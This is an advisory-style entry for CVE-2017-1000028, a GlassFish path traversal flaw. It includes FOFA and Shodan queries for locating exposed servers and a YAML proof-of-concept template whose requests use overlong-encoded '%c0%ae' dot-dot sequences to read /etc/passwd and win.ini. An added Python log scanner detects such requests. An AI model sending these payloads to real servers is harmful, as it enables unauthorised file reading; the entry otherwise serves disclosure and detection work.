CVE-2017-1000028: GlassFish LFI

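Date: 2025-08-01 | Affected software: GlassFish | PoC: public

Vulnerability description

GlassFish is a robust, commercially compatible application server of production-grade quality that can be used free of charge for development, deployment and redistribution. Developers can obtain the source code for free and can also modify it. Cause of the GlassFish vulnerability: under Java semantics, "%c0%ae" is parsed as "\uC0AE" and is finally converted to the ASCII character ".".
fofa: fid="90r39jo6/0uRhK8ILW65Lw=="
shodan: http.html:"GlassFish"

PoC code [public]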

id: CVE-2017-1000028

info:
  name: GlassFish LFI
  author: sharecast
  severity: high
  verified: false
  description: |-
    GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."
    fofa: fid="90r39jo6/0uRhK8ILW65Lw=="
    shodan: http.html:"GlassFish"
  tags: cve,cve2017,lfi,glassfish
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

  r1:
    request:
      method: POST
      path: /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0() || r1()
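
Added example, not part of the original entry or of the GlassFish project: a log check for the decoding flaw described above. The bytes C0 AE are the overlong two-byte UTF-8 form of U+002E ("."), so the code percent-decodes each request path, flags overlong sequences, and reports the path a lax decoder would see. The log lines, the access-log format and all function names are assumptions made for this example.

```python
import re

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
# Lead bytes 0xC0/0xC1 can only encode code points below 0x80, i.e. an
# overlong form of plain ASCII. Strict UTF-8 decoders must reject them.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed access-log lines, not captured traffic
    '198.51.100.7 - - [01/Aug/2025:10:00:00 +0000] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1432',
    '198.51.100.9 - - [01/Aug/2025:10:00:05 +0000] "GET /theme/css/style.css HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Aug/2025:10:00:09 +0000] "GET /docs/caf%C3%A9.html HTTP/1.1" 200 900',
]

def percent_decode(raw_path):
    """Turn %XX escapes into raw bytes without interpreting them as text."""
    data = raw_path.encode("ascii", "replace")
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def lenient_fold(data):
    """Collapse overlong 2-byte forms to the ASCII byte a lax decoder yields."""
    def fold(m):
        lead, cont = m.group(0)  # iterating bytes gives two ints
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return OVERLONG.sub(fold, data)

def inspect_path(raw_path):
    """Return overlong sequences found and the path a lax decoder would see."""
    decoded = percent_decode(raw_path)
    folded = lenient_fold(decoded)
    return {
        "overlong": sorted({m.group(0).hex() for m in OVERLONG.finditer(decoded)}),
        "effective_path": folded.decode("latin-1"),
        "traversal": b".." in re.split(rb"[/\\]", folded),
    }

def scan(lines):
    """Return (raw_path, finding) for log lines whose path has overlong bytes."""
    hits = []
    for m in filter(None, map(REQUEST.search, lines)):
        finding = inspect_path(m.group(1))
        if finding["overlong"]:
            hits.append((m.group(1), finding))
    return hits

if __name__ == "__main__":
    for path, finding in scan(SAMPLE_LOG):
        print(path, "->", finding)
```

Valid multi-byte UTF-8 such as `%C3%A9` is not flagged, because only the lead bytes 0xC0 and 0xC1 are treated as overlong; double percent-encoding is outside what this check covers.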
